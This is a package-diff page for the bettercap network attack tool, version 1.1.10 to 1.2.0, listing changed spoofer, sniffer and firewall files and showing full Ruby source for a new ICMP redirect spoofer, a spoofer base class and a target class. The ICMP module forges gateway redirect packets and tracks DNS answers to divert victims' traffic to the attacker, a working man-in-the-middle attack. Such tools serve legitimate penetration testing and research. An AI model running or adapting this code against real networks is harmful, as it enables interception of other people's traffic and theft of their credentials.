RubyGems - bettercap - Versions diffs - 1.1.10 → 1.2.0 - Mend

bettercap 1.1.10 → 1.2.0

Files changed (53) hide show

checksums.yaml +4 -4
data/TODO.md +8 -7
data/bin/bettercap +8 -2
data/lib/bettercap.rb +5 -4
data/lib/bettercap/context.rb +54 -8
data/lib/bettercap/discovery/agents/arp.rb +17 -4
data/lib/bettercap/discovery/agents/base.rb +16 -52
data/lib/bettercap/discovery/agents/icmp.rb +25 -17
data/lib/bettercap/discovery/agents/udp.rb +9 -20
data/lib/bettercap/discovery/{discovery.rb → thread.rb} +10 -9
data/lib/bettercap/error.rb +1 -2
data/lib/bettercap/factories/{firewall_factory.rb → firewall.rb} +11 -7
data/lib/bettercap/factories/{parser_factory.rb → parser.rb} +13 -3
data/lib/bettercap/factories/{spoofer_factory.rb → spoofer.rb} +10 -3
data/lib/bettercap/firewalls/base.rb +76 -0
data/lib/bettercap/firewalls/linux.rb +26 -16
data/lib/bettercap/firewalls/osx.rb +22 -13
data/lib/bettercap/firewalls/redirection.rb +15 -1
data/lib/bettercap/httpd/server.rb +5 -0
data/lib/bettercap/logger.rb +29 -8
data/lib/bettercap/network.rb +105 -105
data/lib/bettercap/options.rb +99 -41
data/lib/bettercap/packet_queue.rb +92 -0
data/lib/bettercap/proxy/certstore.rb +49 -43
data/lib/bettercap/proxy/module.rb +4 -2
data/lib/bettercap/proxy/proxy.rb +7 -2
data/lib/bettercap/proxy/request.rb +28 -16
data/lib/bettercap/proxy/response.rb +23 -2
data/lib/bettercap/proxy/stream_logger.rb +6 -0
data/lib/bettercap/proxy/streamer.rb +13 -5
data/lib/bettercap/proxy/thread_pool.rb +6 -14
data/lib/bettercap/shell.rb +5 -3
data/lib/bettercap/sniffer/parsers/base.rb +7 -1
data/lib/bettercap/sniffer/parsers/custom.rb +6 -1
data/lib/bettercap/sniffer/parsers/ftp.rb +8 -5
data/lib/bettercap/sniffer/parsers/httpauth.rb +4 -1
data/lib/bettercap/sniffer/parsers/https.rb +4 -1
data/lib/bettercap/sniffer/parsers/irc.rb +8 -5
data/lib/bettercap/sniffer/parsers/mail.rb +8 -5
data/lib/bettercap/sniffer/parsers/ntlmss.rb +21 -18
data/lib/bettercap/sniffer/parsers/post.rb +4 -1
data/lib/bettercap/sniffer/parsers/url.rb +4 -1
data/lib/bettercap/sniffer/sniffer.rb +7 -3
data/lib/bettercap/spoofers/arp.rb +69 -94
data/lib/bettercap/spoofers/base.rb +132 -0
data/lib/bettercap/spoofers/icmp.rb +200 -0
data/lib/bettercap/spoofers/none.rb +8 -2
data/lib/bettercap/target.rb +117 -90
data/lib/bettercap/update_checker.rb +6 -0
data/lib/bettercap/version.rb +3 -1
metadata +24 -8
data/lib/bettercap/base/ifirewall.rb +0 -46
data/lib/bettercap/base/ispoofer.rb +0 -32

data/lib/bettercap/spoofers/base.rb ADDED Viewed

@@ -0,0 +1,132 @@
+=begin
+BETTERCAP
+Author : Simone 'evilsocket' Margaritelli
+Email  : evilsocket@gmail.com
+Blog   : http://www.evilsocket.net/
+This project is released under the GPL 3 license.
+=end
+module BetterCap
+module Spoofers
+# Base class for BetterCap::Spoofers modules.
+class Base
+  # Will raise NotImplementedError .
+  def initialize
+    not_implemented_method!
+  end
+  # Will raise NotImplementedError .
+  def start
+    not_implemented_method!
+  end
+  # Will raise NotImplementedError .
+  def stop
+    not_implemented_method!
+  end
+private
+  def sniff_packets( filter )
+    begin
+      @capture = PacketFu::Capture.new(
+          iface: @ctx.options.iface,
+          filter: filter,
+          start: true
+      )
+    rescue  Exception => e
+      Logger.error e.message
+    end
+    @capture.stream.each do |p|
+      begin
+        if not @running
+            Logger.debug 'Stopping thread ...'
+            Thread.exit
+            break
+        end
+        pkt = PacketFu::Packet.parse p rescue nil
+        yield( pkt ) unless pkt.nil?
+      rescue Exception => e
+        Logger.error e.message
+      end
+    end
+  end
+  def spoof_loop( delay )
+    prev_size = @ctx.targets.size
+    loop do
+      if not @running
+          Logger.debug 'Stopping spoofing thread ...'
+          Thread.exit
+          break
+      end
+      size = @ctx.targets.size
+      if size > prev_size
+        Logger.warn "Aquired #{size - prev_size} new targets."
+      elsif size < prev_size
+        Logger.warn "Lost #{prev_size - size} targets."
+      end
+      Logger.debug "Spoofing #{@ctx.targets.size} targets ..."
+      update_targets!
+      @ctx.targets.each do |target|
+        yield(target)
+      end
+      prev_size = @ctx.targets.size
+      sleep(delay)
+    end
+  end
+  def update_gateway!
+    Logger.info "Getting gateway #{@ctx.gateway} MAC address ..."
+    hw = Network.get_hw_address( @ctx.ifconfig, @ctx.gateway )
+    raise BetterCap::Error, "Couldn't determine router MAC" if hw.nil?
+    @gateway = Target.new( @ctx.gateway, hw )
+    Logger.info "  #{@gateway}"
+  end
+  def update_targets!
+    @ctx.targets.each do |target|
+      # targets could change, update mac addresses if needed
+      if target.mac.nil?
+        hw = Network.get_hw_address( @ctx.ifconfig, target.ip )
+        if hw.nil?
+          Logger.warn "Couldn't determine target #{ip} MAC!"
+          next
+        else
+          Logger.info "  Target MAC    : #{hw}"
+          target.mac = hw
+        end
+      # target was specified by MAC address
+      elsif target.ip_refresh
+        ip = Network.get_ip_address( @ctx, target.mac )
+        if ip.nil?
+          Logger.warn "Couldn't determine target #{target.mac} IP!"
+          next
+        else
+          Logger.info "Target #{target.mac} IP : #{ip}" if target.ip.nil? or target.ip != ip
+          target.ip = ip
+        end
+      end
+    end
+  end
+  def not_implemented_method!
+    raise NotImplementedError, 'Spoofers::Base: Unimplemented method!'
+  end
+end
+end
+end

data/lib/bettercap/spoofers/icmp.rb ADDED Viewed

@@ -0,0 +1,200 @@
+=begin
+BETTERCAP
+Author : Simone 'evilsocket' Margaritelli
+Email  : evilsocket@gmail.com
+Blog   : http://www.evilsocket.net/
+This project is released under the GPL 3 license.
+=end
+require 'bettercap/spoofers/base'
+require 'bettercap/error'
+require 'bettercap/context'
+require 'bettercap/network'
+require 'bettercap/logger'
+require 'colorize'
+require 'net/dns'
+require 'resolv'
+module BetterCap
+module Spoofers
+# Class to create ICMP redirection packets.
+class ICMPRedirectPacket < PacketFu::Packet
+    ICMP_REDIRECT = 5
+    ICMP_REDIRECT_HOST = 1
+    IP_PROTO_ICMP = 1
+    IP_PROTO_UDP  = 17
+    include PacketFu::EthHeaderMixin
+    include PacketFu::IPHeaderMixin
+    include PacketFu::ICMPHeaderMixin
+    include PacketFu::UDPHeaderMixin
+    attr_accessor :eth_header, :ip_header, :icmp_header, :ip_encl_header
+    def initialize(args={})
+      @eth_header = PacketFu::EthHeader.new(args).read(args[:eth])
+      @ip_header          = PacketFu::IPHeader.new(args).read(args[:ip])
+      @ip_header.ip_proto = IP_PROTO_ICMP
+      @icmp_header           = PacketFu::ICMPHeader.new(args).read(args[:icmp])
+      @icmp_header.icmp_type = ICMP_REDIRECT
+      @icmp_header.icmp_code = ICMP_REDIRECT_HOST
+      @ip_encl_header          = PacketFu::IPHeader.new(args).read(args[:ip])
+      @ip_encl_header.ip_proto = IP_PROTO_UDP
+      @udp_dummy         = PacketFu::UDPPacket.new
+      @udp_dummy.udp_src = 53
+      @udp_dummy.udp_dst = 53
+      @ip_header.body = @icmp_header
+      @eth_header.body = @ip_header
+      @headers = [@eth_header, @ip_header, @icmp_header]
+      super
+    end
+    def update!( gateway, target, local, address2redirect )
+      @eth_header.eth_src = PacketFu::EthHeader.mac2str(gateway.mac)
+      @ip_header.ip_saddr = gateway.ip
+      @eth_header.eth_dst = PacketFu::EthHeader.mac2str(target.mac)
+      @ip_header.ip_daddr = target.ip
+      @udp_dummy.ip_saddr = target.ip
+      @udp_dummy.ip_daddr = address2redirect
+      @udp_dummy.recalc
+      @icmp_header.body = local.split('.').collect(&:to_i).pack('C*') +
+                          @udp_dummy.ip_header.to_s
+      recalc
+    end
+end
+# This class is responsible of performing ICMP redirect attack on the network.
+class Icmp < Base
+  # Initialize the BetterCap::Spoofers::Icmp object.
+  def initialize
+    @ctx          = Context.get
+    @forwarding   = @ctx.firewall.forwarding_enabled?
+    @gateway      = nil
+    @local        = @ctx.ifconfig[:ip_saddr]
+    @spoof_thread = nil
+    @watch_thread = nil
+    @running      = false
+    @entries      = [ '8.8.8.8', '8.8.4.4',                # Google DNS
+                      '208.67.222.222', '208.67.220.220' ] # OpenDNS
+    update_gateway!
+  end
+  # Send ICMP redirect to the +target+, redirecting the gateway ip and
+  # everything in the @entries list of addresses to us.
+  def send_spoofed_packet( target )
+    ( [@gateway.ip] + @entries ).each do |address|
+      begin
+        Logger.debug "Sending ICMP Redirect to #{target.to_s_compact} redirecting #{address} to us ..."
+        pkt = ICMPRedirectPacket.new
+        pkt.update!( @gateway, target, @local, address )
+        @ctx.packets.push(pkt)
+      rescue Exception => e
+        Logger.debug "#{self.class.name} : #{e.message}"
+      end
+    end
+  end
+  # Start the ICMP redirect spoofing.
+  def start
+    Logger.info "Starting ICMP redirect spoofer ..."
+    stop() if @running
+    @running = true
+    @ctx.firewall.enable_forwarding(true) unless @forwarding
+    @ctx.firewall.enable_send_redirects(false)
+    @spoof_thread = Thread.new { icmp_spoofer }
+    @watch_thread = Thread.new { dns_watcher }
+  end
+  # Stop the ICMP redirect spoofing, reset firewall state.
+  def stop
+    raise 'ICMP redirect spoofer is not running' unless @running
+    Logger.info 'Stopping ICMP redirect spoofer ...'
+    Logger.debug "Resetting packet forwarding to #{@forwarding} ..."
+    @ctx.firewall.enable_forwarding( @forwarding )
+    @running = false
+    begin
+      @spoof_thread.exit
+    rescue; end
+    begin
+      @workers.map(&:exit)
+    rescue; end
+  end
+  private
+  def is_interesting_packet?(pkt)
+    return false if pkt.ip_saddr == @local
+    @ctx.targets.each do |target|
+      if target.ip and ( target.ip == pkt.ip_saddr or target.ip == pkt.ip_daddr )
+        return true
+      end
+    end
+    false
+  end
+  def dns_watcher
+    Logger.info 'DNS watcher started ...'
+    sniff_packets('udp and port 53') { |pkt|
+      next unless is_interesting_packet?(pkt)
+      dns = Net::DNS::Packet.parse(pkt.payload) rescue nil
+      next if dns.nil?
+      Logger.debug dns.inspect
+      if dns.header.anCount > 0
+        dns.answer.each do |a|
+          if a.respond_to?(:address)
+            Logger.debug "[DNS] Redirecting #{a.address.to_s} ..."
+            @entries << a.address.to_s unless @entries.include?(a.address.to_s)
+          end
+        end
+      end
+      if dns.header.qdCount > 0
+        name = dns.question.first.qName
+        if name =~ /\.$/
+          name = name[0,name.size-1]
+        end
+        Logger.info "[#{'DNS'.green}] #{pkt.ip_saddr} is requesting '#{name}' address ..."
+        Resolv.each_address(name) do |ip|
+          @entries << ip unless @entries.include?(ip)
+        end
+      end
+    }
+  end
+  def icmp_spoofer
+    spoof_loop(3) { |target|
+      unless target.ip.nil? or target.mac.nil?
+        send_spoofed_packet target
+      end
+    }
+  end
+end
+end
+end

data/lib/bettercap/spoofers/none.rb CHANGED Viewed

@@ -9,17 +9,23 @@ Blog   : http://www.evilsocket.net/
 This project is released under the GPL 3 license.
 =end
-require 'bettercap/base/ispoofer'
+require 'bettercap/spoofers/base'
 require 'bettercap/logger'
 module BetterCap
-class NoneSpoofer < ISpoofer
+module Spoofers
+# Dummy class used to disable spoofing.
+class None < Base
+  # Initialize the non-spoofing class.
   def initialize
     Logger.warn 'Spoofing disabled.'
   end
+  # This does nothing.
   def start; end
+  # This does nothing.
   def stop; end
 end
 end
+end

data/lib/bettercap/target.rb CHANGED Viewed

@@ -13,112 +13,139 @@ require 'bettercap/logger'
 require 'socket'
 module BetterCap
+# This class represents a target, namely a single endpoint device on the
+# network.
 class Target
-    attr_accessor :ip, :mac, :vendor, :hostname, :ip_refresh
-    NBNS_TIMEOUT = 30
-    NBNS_PORT    = 137
-    NBNS_BUFSIZE = 65536
-    NBNS_REQUEST = "\x82\x28\x0\x0\x0\x1\x0\x0\x0\x0\x0\x0\x20\x43\x4B\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x0\x0\x21\x0\x1"
-    @@prefixes = nil
-    def initialize( ip, mac=nil )
-      if Network.is_ip?(ip)
-        @ip = ip
-        @ip_refresh = false
-      else
-        @ip         = nil
-        mac         = ip
-        @ip_refresh = true
-      end
-      @mac      = Target.normalized_mac(mac) unless mac.nil?
-      @vendor   = Target.lookup_vendor(@mac) unless mac.nil?
-      @hostname = nil
-      @resolver = Thread.new { resolve! } unless Context.get.options.no_target_nbns or @ip.nil?
+  # The IP address of this device.
+  attr_accessor :ip
+  # The MAC address of the device network interface.
+  attr_accessor :mac
+  # Vendor of the device network interface if available.
+  attr_accessor :vendor
+  # NetBIOS hostname of the device if available.
+  attr_accessor :hostname
+  # True if the IP attribute of this target needs to be updated.
+  attr_accessor :ip_refresh
+  # Timeout in seconds for the NBNS hostname resolution request.
+  NBNS_TIMEOUT = 30
+  # UDP port for the NBNS hostname resolution request.
+  NBNS_PORT    = 137
+  # Buffer size for the NBNS hostname resolution request.
+  NBNS_BUFSIZE = 65536
+  # NBNS hostname resolution request buffer.
+  NBNS_REQUEST = "\x82\x28\x0\x0\x0\x1\x0\x0\x0\x0\x0\x0\x20\x43\x4B\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x0\x0\x21\x0\x1"
+  @@prefixes = nil
+  # Create a +Target+ object given its +ip+ and (optional) +mac+ address.
+  # The +ip+ argument could also be a MAC address itself, in this case the
+  # ip address will be parsed from the computer ARP cache and updated
+  # accordingly.
+  def initialize( ip, mac=nil )
+    if Network.is_ip?(ip)
+      @ip = ip
+      @ip_refresh = false
+    else
+      @ip         = nil
+      mac         = ip
+      @ip_refresh = true
     end
-    def sortable_ip
-      @ip.split('.').inject(0) {|total,value| (total << 8 ) + value.to_i}
-    end
-    def mac=(value)
-      @mac = Target.normalized_mac(value)
-      @vendor = Target.lookup_vendor(@mac) if not @mac.nil?
-    end
-    def to_s
-      s = sprintf( '%-15s : %-17s', if @ip.nil? then '???' else @ip end, @mac )
-      s += " / #{@hostname}" unless @hostname.nil?
-      s += if @vendor.nil? then " ( ??? )" else " ( #{@vendor} )" end
-      s
-    end
-    def to_s_compact
-      if @hostname
-        "#{@hostname}/#{@ip}"
-      else
-        @ip
-      end
+    @mac      = Target.normalized_mac(mac) unless mac.nil?
+    @vendor   = Target.lookup_vendor(@mac) unless mac.nil?
+    @hostname = nil
+    @resolver = Thread.new { resolve! } unless Context.get.options.no_target_nbns or @ip.nil?
+  end
+  # Return the integer representation of the +ip+ attribute which can be
+  # used for sorting a list of +Target+ objects+
+  def sortable_ip
+    @ip.split('.').inject(0) {|total,value| (total << 8 ) + value.to_i}
+  end
+  # +mac+ attribute setter, it will normalize the +value+ and perform
+  # a vendor lookup.
+  def mac=(value)
+    @mac = Target.normalized_mac(value)
+    @vendor = Target.lookup_vendor(@mac) if not @mac.nil?
+  end
+  # Return a verbose string representation of this object.
+  def to_s
+    s = sprintf( '%-15s : %-17s', if @ip.nil? then '???' else @ip end, @mac )
+    s += " / #{@hostname}" unless @hostname.nil?
+    s += if @vendor.nil? then " ( ??? )" else " ( #{@vendor} )" end
+    s
+  end
+  # Return a compact string representation of this object.
+  def to_s_compact
+    if @hostname
+      "#{@hostname}/#{@ip}"
+    else
+      @ip
     end
-    def equals?(ip, mac)
-      # compare by ip
-      if mac.nil?
-        return ( @ip == ip )
-      # compare by mac
-      elsif !@mac.nil? and ( @mac == mac )
-        Logger.info "Found IP #{ip} for target #{@mac}!" if @ip.nil?
-        @ip = ip
-        return true
-      end
-      false
+  end
+  # Return true if this +Target+ is equal to the specified +ip+ and +mac+,
+  # otherwise return false.
+  def equals?(ip, mac)
+    # compare by ip
+    if mac.nil?
+      return ( @ip == ip )
+    # compare by mac
+    elsif !@mac.nil? and ( @mac == mac )
+      Logger.info "Found IP #{ip} for target #{@mac}!" if @ip.nil?
+      @ip = ip
+      return true
     end
+    false
+  end
-    def self.normalized_mac(v)
-      v.split(':').map { |e| if e.size == 2 then e.upcase else "0#{e.upcase}" end }.join(':')
-    end
+  def self.normalized_mac(v)
+    v.split(':').map { |e| if e.size == 2 then e.upcase else "0#{e.upcase}" end }.join(':')
+  end
 private
-    def resolve!
-      resp, sock = nil, nil
-      begin
-        sock = UDPSocket.open
-        sock.send( NBNS_REQUEST, 0, @ip, NBNS_PORT )
-        resp = if select([sock], nil, nil, NBNS_TIMEOUT)
-          sock.recvfrom(NBNS_BUFSIZE)
-        end
-        if resp
-          @hostname = parse_nbns_response resp
-          Logger.info "Found NetBIOS name '#{@hostname}' for address #{@ip}"
-        end
-      rescue Exception => e
-        Logger.debug e
-      ensure
-        sock.close if sock
+  def resolve!
+    resp, sock = nil, nil
+    begin
+      sock = UDPSocket.open
+      sock.send( NBNS_REQUEST, 0, @ip, NBNS_PORT )
+      resp = if select([sock], nil, nil, NBNS_TIMEOUT)
+        sock.recvfrom(NBNS_BUFSIZE)
       end
+      if resp
+        @hostname = parse_nbns_response resp
+        Logger.info "Found NetBIOS name '#{@hostname}' for address #{@ip}"
+      end
+    rescue Exception => e
+      Logger.debug e
+    ensure
+      sock.close if sock
     end
+  end
-    def parse_nbns_response resp
-      resp[0][57,15].to_s.strip
-    end
+  def parse_nbns_response resp
+    resp[0][57,15].to_s.strip
+  end
-    def self.lookup_vendor( mac )
-      if @@prefixes == nil
-        Logger.debug 'Preloading hardware vendor prefixes ...'
+  def self.lookup_vendor( mac )
+    if @@prefixes == nil
+      Logger.debug 'Preloading hardware vendor prefixes ...'
-        @@prefixes = {}
-        filename = File.dirname(__FILE__) + '/hw-prefixes'
-        File.open( filename ).each do |line|
-          if line =~ /^([A-F0-9]{6})\s(.+)$/
-            @@prefixes[$1] = $2
-          end
+      @@prefixes = {}
+      filename = File.dirname(__FILE__) + '/hw-prefixes'
+      File.open( filename ).each do |line|
+        if line =~ /^([A-F0-9]{6})\s(.+)$/
+          @@prefixes[$1] = $2
         end
       end
-      @@prefixes[ mac.split(':')[0,3].join('').upcase ]
     end
+    @@prefixes[ mac.split(':')[0,3].join('').upcase ]
+  end
 end
 end